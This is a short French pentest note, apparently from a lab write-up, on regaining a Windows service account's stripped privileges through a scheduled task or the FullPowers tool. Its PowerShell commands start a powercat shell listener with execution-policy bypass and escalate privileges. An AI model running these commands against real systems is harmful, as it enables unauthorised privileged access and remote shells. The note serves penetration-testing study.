Dans certains cas, un exécutable peut être lancé avec un compte de service tout en excluant certains des privilèges dont il dispose, par exemple :  Ce qui fait que nous pouvons éventuellement avoir un contrôle de ce compte, mais sans ses privilèges associés. --- ### Réactiver les privilèges avec une tâche planifiée L'astuce consiste en la création d'une tâche planifiée avec ce compte (par exemple l'exécution d'un nouveau reverse-shell) : la tâché planifiée se lancera avec le compte de service "nature peinture" et donc avec ses privilèges habituels. ```powershell $TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `". C:\TOOLS\powercat.ps1; powercat -l -p 7002 -ep`"" ``` ```powershell Register-ScheduledTask -Action $TaskAction -TaskName "SomeTask" Start-ScheduledTask -TaskName "SomeTask" ``` --- ### Réactiver les privilèges avec FullPowers.exe https://github.com/itm4n/FullPowers ```powershell c:\TOOLS>FullPowers -c "powershell -ep Bypass" [+] Successfully created scheduled task. PID=9028 [+] CreateProcessAsUser() OK Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Try the new cross-platform PowerShell https://aka.ms/pscore6 PS C:\WINDOWS\system32> Get-ExecutionPolicy Bypass ```